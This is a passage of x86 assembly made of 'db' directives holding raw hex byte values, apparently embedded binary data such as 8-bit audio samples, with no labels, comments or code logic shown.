db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
